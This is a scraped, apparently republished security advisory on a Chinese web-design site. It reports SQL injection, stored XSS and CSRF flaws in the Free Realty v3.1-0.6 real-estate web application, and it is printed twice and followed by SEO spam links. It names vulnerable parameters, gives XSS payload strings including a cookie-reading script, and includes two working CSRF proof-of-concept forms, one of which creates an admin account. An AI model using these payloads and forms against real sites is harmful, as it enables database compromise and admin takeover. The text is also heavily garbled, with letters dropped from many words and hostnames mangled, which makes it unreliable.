Free Realty v3.1-0.6的缺陷介绍及其修复方法
网站建设 2023-02-09 11:06www.1681989.com免费网站
标题Free Reality v3.1-0.6 - Multiple Web Vulnerabilities
介绍:
=============
Free Realty is primarily designed for real estate agents and offices to list properties on the ter. With Free Realty the end
user does not need to be fluent web page design. Read more the demo site
This is a fork of
software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested
contued development on the 2.x series. Other sites of note regardg 2.x development
.1axn./gi-b/openforum/ikonboard.cgi the origal discussion board, before Jon opened up his own.
影响版本:
=========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities the Free Reality v3.1-0.6 web application.
问题类型:Remote
技术分析:
========
1.1
A remote SQL Injection vulnerability is detected the Free Reality v3.1-0.6 web application.
The vulnerability allows an attacker (remote) or local low privileged user aount to ject/execute own sql mands on
the affected application dbms. Suessful exploitation of the vulnerability results dbms & application promise.
Vulnerable Module(s):
[+] agentdisplay.php?view=
[+] /adm/adm.php?edit=
1.2
Multiple persistent put validation vulnerabilities are detected the Free Reality v3.1-0.6 web application.
The bugs allow remote attackers to implement/ject malicious script code on the application side (persistent).
Suessful exploitation of the vulnerability can lead to session hijackg (manager/adm) or stable (persistent) context manipulation.
Exploitation requires low user ter action.
Vulnerable Module(s):
[+] adm/agenteditor.php - ject notes about the Agent
[+] agentadm.php?edit=2 - ject title / preview description: / Long description: / notes
[+] agentadm.php?action=addlistg ject title / preview description: / Long description: / notes
[+] adm/admfeatures.php - Add new feature
1.3
A cross site request fery vulnerability is detected the Free Reality v3.1-0.6 web application. The bugs allow remote
attackers with high required user ter action to edit user aounts. Suessful exploitation can lead to aount aess.
To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document the
remote can implement his own values for the update because of no form or token protection. When adm get now forced to
execute the script via lk he is executg the new value on the update of the application if his session is not expired.
Vulnerable Module(s):
[+] adm/agenteditor.php?action=addagent - Add agent
[+] adm/agenteditor.php?admmodify=2 - Modify Agent
测试证明:
=================
1.1
The sql jection vulnerability can be exploited by remote attackers without user ter action. For demonstration or reproduce ...
PoC:
https://.jb51. /FR/agentdisplay.php?view=1[SQL-INJECTION!]
http://127.0.0.1/FR/adm/adm.php?edit=2[SQL-INJECTION!]
1.2
The persistent put validation vulnerability can be exploited by remote attackers with medium till low required user ter action.
For demonstration or reproduce ...
Note:
The issue can be exploited by an sert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strgs:
>"<<iframe src=http:// .jb51. />37</iframe> ... or
>"<script>alert(document.cookie)</script><div style="1
1.3
The csrf vulnerability can be exploited by remote attackers with high required user ter action. For demonstration or reproduce ...
<html>
<form name="test" action="http://127.0.0.1/FR/adm/agenteditor.php?admmodify=2" method="post">
<put type="hidden" name="agent" value="test2"><br/>
<put type="hidden" name="agenttitle" value="test3"><br/>
<put type="hidden" name="agentpass" value="storm"><br/>
</form>
<script>document.test.submit();</script>
</html>
<html>
<form name="addagent" action="http://127.0.1.1/FR/adm/agenteditor.php?action=addagent" method="post">
<put type="hidden" name="agent" value="test3"><br/>
<put type="hidden" name="agenttitle" value="test3"><br/>
<put type="hidden" name="agentpass" value="test3"><br/>
<put type="hidden" name="agentfax" value="test3"><br/>
<put type="hidden" name="agentcell" value="test3"><br/>
<put type="hidden" name="agentphone" value="test3"><br/>
<put type="hidden" name="agenturl" value="test3"><br/>
<put type="hidden" name="agentemail=" value="test3@hotmail."><br/>
<put type="hidden" name="user_level" value="adm"><br/>
<put type="hidden" name="notes" value="TEST#"><br/>
</form>
<script>document.addagent.submit();</script>
</html>
Risk:
=====
1.1
The security risk of the remote SQL jection vulnerability is estimated as critical.
1.2
The security risk of the persistent put validation vulnerability is estimated as medium.
1.3
The security risk of the cross site request fery vulnerability is estimated as low(+).
介绍:
=============
Free Realty is primarily designed for real estate agents and offices to list properties on the ter. With Free Realty the end
user does not need to be fluent web page design. Read more the demo site
This is a fork of
software written by Jon Roig called Open Realty. Jon has moved on to version 3.0 while a number of users have requested
contued development on the 2.x series. Other sites of note regardg 2.x development
.1axn./gi-b/openforum/ikonboard.cgi the origal discussion board, before Jon opened up his own.
影响版本:
=========
A Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities the Free Reality v3.1-0.6 web application.
问题类型:Remote
技术分析:
========
1.1
A remote SQL Injection vulnerability is detected the Free Reality v3.1-0.6 web application.
The vulnerability allows an attacker (remote) or local low privileged user aount to ject/execute own sql mands on
the affected application dbms. Suessful exploitation of the vulnerability results dbms & application promise.
Vulnerable Module(s):
[+] agentdisplay.php?view=
[+] /adm/adm.php?edit=
1.2
Multiple persistent put validation vulnerabilities are detected the Free Reality v3.1-0.6 web application.
The bugs allow remote attackers to implement/ject malicious script code on the application side (persistent).
Suessful exploitation of the vulnerability can lead to session hijackg (manager/adm) or stable (persistent) context manipulation.
Exploitation requires low user ter action.
Vulnerable Module(s):
[+] adm/agenteditor.php - ject notes about the Agent
[+] agentadm.php?edit=2 - ject title / preview description: / Long description: / notes
[+] agentadm.php?action=addlistg ject title / preview description: / Long description: / notes
[+] adm/admfeatures.php - Add new feature
1.3
A cross site request fery vulnerability is detected the Free Reality v3.1-0.6 web application. The bugs allow remote
attackers with high required user ter action to edit user aounts. Suessful exploitation can lead to aount aess.
To exploit the issue the attacker need to create a manipulated copy the edit user mask/form. Inside of the document the
remote can implement his own values for the update because of no form or token protection. When adm get now forced to
execute the script via lk he is executg the new value on the update of the application if his session is not expired.
Vulnerable Module(s):
[+] adm/agenteditor.php?action=addagent - Add agent
[+] adm/agenteditor.php?admmodify=2 - Modify Agent
测试证明:
=================
1.1
The sql jection vulnerability can be exploited by remote attackers without user ter action. For demonstration or reproduce ...
PoC:
https://.jb51. /FR/agentdisplay.php?view=1[SQL-INJECTION!]
http://127.0.0.1/FR/adm/adm.php?edit=2[SQL-INJECTION!]
1.2
The persistent put validation vulnerability can be exploited by remote attackers with medium till low required user ter action.
For demonstration or reproduce ...
Note:
The issue can be exploited by an sert on the Created Object function with script code as value.
The result is the persistent execution out of the web application context.
Strgs:
>"<<iframe src=http:// .jb51. />37</iframe> ... or
>"<script>alert(document.cookie)</script><div style="1
1.3
The csrf vulnerability can be exploited by remote attackers with high required user ter action. For demonstration or reproduce ...
<html>
<form name="test" action="http://127.0.0.1/FR/adm/agenteditor.php?admmodify=2" method="post">
<put type="hidden" name="agent" value="test2"><br/>
<put type="hidden" name="agenttitle" value="test3"><br/>
<put type="hidden" name="agentpass" value="storm"><br/>
</form>
<script>document.test.submit();</script>
</html>
<html>
<form name="addagent" action="http://127.0.1.1/FR/adm/agenteditor.php?action=addagent" method="post">
<put type="hidden" name="agent" value="test3"><br/>
<put type="hidden" name="agenttitle" value="test3"><br/>
<put type="hidden" name="agentpass" value="test3"><br/>
<put type="hidden" name="agentfax" value="test3"><br/>
<put type="hidden" name="agentcell" value="test3"><br/>
<put type="hidden" name="agentphone" value="test3"><br/>
<put type="hidden" name="agenturl" value="test3"><br/>
<put type="hidden" name="agentemail=" value="test3@hotmail."><br/>
<put type="hidden" name="user_level" value="adm"><br/>
<put type="hidden" name="notes" value="TEST#"><br/>
</form>
<script>document.addagent.submit();</script>
</html>
Risk:
=====
1.1
The security risk of the remote SQL jection vulnerability is estimated as critical.
1.2
The security risk of the persistent put validation vulnerability is estimated as medium.
1.3
The security risk of the cross site request fery vulnerability is estimated as low(+).
网站设计
- 静宁会SEO的网站建设公司:全面提升您的网络影
- 提升在线业务的关键:选择最佳的丽水网站建设
- 浙江网站优化发展潜力如何
- 井研专业的网站建设公司:打造您的在线品牌
- 灵山SEO网站建设公司:提升您的在线业务表现
- 蒙城网站建设优化公司:提升您网站表现的理想
- 阳谷企业网站优化:提升线上业务力的关键
- 樟树专业的网站建设公司:打造您在线业务的坚
- 通河百度SEO排名的策略与技巧
- 重庆百度快照排名如何进行精准的客户引流
- 重庆百度快照排名
- 常宁便宜的建站公司:助您轻松打造在线业务
- 巫溪百度网站优化:提升网站曝光率与流量的关
- 湖北整站优化怎么做才能放大客户需求
- 闸北网站建设多少钱?全面解析与预算规划
- 辽宁企业网站优化怎么做电话营销